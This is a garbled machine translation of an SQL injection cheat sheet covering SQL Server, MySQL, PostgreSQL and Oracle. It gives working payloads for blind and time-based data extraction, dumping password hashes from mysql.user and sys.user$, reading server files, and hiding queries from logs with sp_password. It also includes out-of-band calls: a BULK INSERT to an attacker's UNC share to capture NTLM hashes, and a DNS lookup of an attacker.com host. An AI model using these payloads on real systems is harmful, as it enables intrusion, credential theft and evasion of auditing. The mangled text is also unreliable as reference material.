SQL injection quick query table (lower) and Oracle injection quick query table

SQL injection quick query table (lower) and Oracle injection quick query table
0x00 directory blind note about blind note instances in actual blind note latency blind note waitfor delay [time] (S) instance BENCHMARK () (M) instance pg_sleep (seconds) (P) cover up traces-sp_password log bypass (S) injection test some other MySQL notes MySQL functions SQL Injection advanced use of force SQL Server to obtain NTLM hash Bulk insert UNC shared file (S) 0x01 blind note about blind note a complete and well-developed application, you generally do not see the error prompt, therefore, you cannot extract data from Union attacks or errors. You cannot view the response on the page, however, you can still know that the query results are completely blinded by the same HTTP status code, and you cannot see any changes in any input. You can only inject logs or other information. Although not common. In general blind injection, you can use the If statement or ** WHERE query injection \ *** | (generally relatively simple )*, in the case of completely blind injection, you need to use some latency functions and analyze the response time. Therefore, in SQL Server, you need to use WAIT FOR DELAY '0: 0: 10', use BENCHMARK () in MySQL, and use pg_sleep (10) in PostgreSQL ), and some PL/SQL tips in ORACLE. In practice, the following output is from a real private blind note tool to test a SQL Server backend application and traverse the table name. These requests complete the first character of the first table. Because it is an automated attack, SQL queries are a little more complex than the actual needs. The binary search is used to detect the ASCII code of characters. The TRUE or FALSE flag indicates that the query returns true or false.

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80-- FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)

 

Since the last two queries are both false, we can clearly know that the ASCII code of the first character of the table name is 80, that is, "P ". This is the method of blind injection through the binary algorithm. Other known methods are to read data in one bit by bit. These methods are effective under different conditions. Latency blind injection is used only when there is no prompt (really blind) at all. Otherwise, use the 1/0 method to identify the difference by mistake. Second, be careful when using a latency of more than 20 seconds, because the connection API between the application and the database may be deemed as timeout ). Waitfor delay time is similar to sleep, waiting for a specific time. Use the CPU to wait for the database. Waitfor delay '0: 0: 10' -- you can also use waitfor delay '0: 0: 100' to create a sa instance? If (select user) = 'sa 'waitfor delay' 0: 0: 10' ProductID = 1; waitfor delay '0: 0: 10' -- ProductID = 1 ); waitfor delay '0: 0: 10' -- ProductID = 1'; waitfor delay '0: 0: 10' -- ProductID = 1'); waitfor delay '0: 0: 10' -- ProductID = 1); waitfor delay '0: 0: 10' -- ProductID = 1'); waitfor delay '0: 0: 10' -- BENCHMARK () (M) In general, I do not like to use this for MySQL latency. Be careful because it will consume server resources very quickly. Is the BENCHMARK (howmanytimes, do this) instance root? Great! If exists (SELECT * FROM users WHERE username = 'root') BENCHMARK (1000000000, MD5 (1) checks whether the table exists if (SELECT * FROM login) BENCHMARK (1000000, MD5 (1) pg_sleep (seconds) (P) specifies the number of seconds for sleep. SELECT pg_sleep (10); sleep for ten seconds to mask traces-sp_password log bypass (S) for security reasons, SQL Server does not record query logs containing this option into the log (!). Therefore, if you add this option to the query, your query will not appear in the database log. Of course, the server log will still exist, so if you can, try the POST method. 0x02 injection tests these tests are simple and clear, suitable for blind injection and quietly engaged. Product. asp? Id = 4 (SMO) product. asp? Id = 5-1product.asp? Id = 4 OR 1 = 1product. asp? Name = Book product. asp? Name = Bo' % 2b 'okproduct. asp? Name = Bo' | 'OK (OM) product. asp? Name = Book 'OR 'X' = 'x0x03 some other MySQL note subqueries can only use User SELECT User and Password FROM mysql in MySQL4.1 +. user; SELECT 100000 union select if (SUBSTRING (Password,) = '2', BENCHMARK (, SHA1 (1), 0) User, Password FROM mysql. user WHERE User = 'root'; SELECT... into dumpfile writes queries to a new file (existing files cannot be modified) UDF function create function LockWorkStation returns integer soname 'user32'; select LockWorkStation (); create function ExitProcess return S integer soname 'kernel32'; select exitprocess (); select user (); SELECT password, USER () FROM mysql. user; select substring (user_password,) FROM mb_users WHERE user_group = 1; query for file reading. php? User = 1 + union + select + load_file (0x63 ...),, 1, 1MySQL does not enable this function by default when reading file content! Create table foo (line blob); load data infile 'C:/boot. ini 'into table foo; select * from foo; Various latency in MySQL select benchmark (500000, sha1 ('test'); query. php? User = 1 + union + select + benchmark (500000, sha1 (0x414141, 100000, select if (user () like 'root @ % ', benchmark (, sha1 ('test'), 'false '); traverse the data, brute-force cracking: select if (ascii (substring (user (), 100000)> 7) & 1, benchmark (, sha1 ('test ')), 'false'); MySQL's easy-to-use function MD5 () MD5 hash SHA1 () SHA1 hash PASSWORD () ENCODE () COMPRESS () compresses data, reading a large amount of data during blind injection is useful for ROW_COUNT () SCHEMA () VERSION () is the same as @ version for advanced use of SQL injection. Generally, you perform SQL Injection somewhere and expect it to not filter illegal operations, this is a level that most people do not notice (hidden layer problem) Name: '+ (select top 1 password FROM users) + 'email: if the application uses an insecure storage method or step in the name table, it then writes the password of the first user into your name. Forcing SQL Server to obtain the NTLM hash attack can help you obtain the Windows password of the target SQL Server. However, your connection may be intercepted by the firewall. This can be used as a very useful intrusion test. We force the SQL Server to connect to our WindowsUNC share and capture NTLM sessions through the packet capture software (Cain & Abel. Bulk insert UNC shared file (S) bulk insert foo from '\ YOURIPADDRESS \ C $ \ x.txt' II. Oracle injection lookup table this article is translated by Yinzo. Reprinted with your signature. Original article address: http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet Note: Some of the following queries can only be executed by the admin. I will mark them with "-priv" at the end of the query. Test version: SELECT banner FROM v $ version WHERE banner LIKE 'oracle % '; SELECT banner FROM v $ version WHERE banner LIKE 'tns %'; SELECT version FROM v $ instance; note: SELECT 1 FROM dual-comment note: the SELECT statement of Oracle must contain the FROM clause, so when we are not really preparing to query a table, we must use a false table name 'dual'. Current user: SELECT user FROM dual to list all users: SELECT username FROM all_users order by username; SELECT name FROM sys. user $;-priv: SELECT name, password, Status FROM sys. user $-priv, <= 10g. astatus can give you the SELECT name, spare4 FROM sys. user $-priv, 11g password cracking: checkpwd can crack the list permission for DES-based hash of Oracle8, 9, and 10: SELECT * FROM session_privs; -SELECT * FROM dba_sys_privs WHERE grantee = 'dbsnmp ';-priv: List SELECT grantee FROM dba_sys_privs WHERE privilege = 'select any dictionary';-priv, select grantee, GRANTED_ROLE FROM DBA_RO LE_PRIVS; List DBA accounts: select distinct grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'yes';-priv: List DBA and the current database with corresponding permissions: SELECT global_name FROM global_name; SELECT name FROM v $ database; SELECT instance_name FROM v $ instance; select sys. DATABASE_NAME from dual; list databases: select distinct owner FROM all_tables;-list databases (one user)-query other databases through the TNS listener. for more information, see tnscmd. List field names: SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; List table names: SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; use the field name to find the corresponding table: SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '% PASS %';-Note: The table names are in uppercase to query row N: SELECT username FROM (select rownum r, username FROM all_users order by username) WHERE r = 9;-query the nth character of a query in the first row (starting FROM 1: SELECT substr ('abc', 3, 1) FROM dual;-get the third character 'C' Bitwise AND: SELECT bitand (6, 2) FROM dual; -returns 2 SELECT bitand (6, 1) FROM dual;-returns 0 ASCII value to character: SELECT chr (65) FROM dual;-returns A character to ASCII code: SELECT ascii ('A') FROM dual;-return 65 type conversion: select cast (1 AS char) FROM dual; select cast ('1' AS int) FROM dual; concatenated character: SELECT 'A' | 'B' FROM dual;-return ABIF statement: BEGIN IF 1 = 1 THEN dbms_lock.sleep (3); ELSE dbms_lock.sleep (0); END IF; END;-Case statements that are not useful WHEN used together with SELECT statements: select case when 1 = 1 THEN 1 ELSE 2 end from dual; -returns 1 select case when 1 = 2 THEN 1 ELSE 2 end from dual;-returns 2 bypassing quotation marks: SELECT chr (65) | chr (66) FROM dual; -Return AB latency: BEGIN DBMS_LOCK.SLEEP (5); END;-priv. SELECT UTL_INADDR.get_host_name ('10. 0.0.1 ') FROM dual;-if reverse query is slow, SELECT UTL_INADDR.get_host_address ('blah.attacker.com') FROM dual;-if the query is slow, SELECT UTL_HTTP.REQUEST (' http://google.com ') FROM dual;-if the TCP packet is intercepted or slow-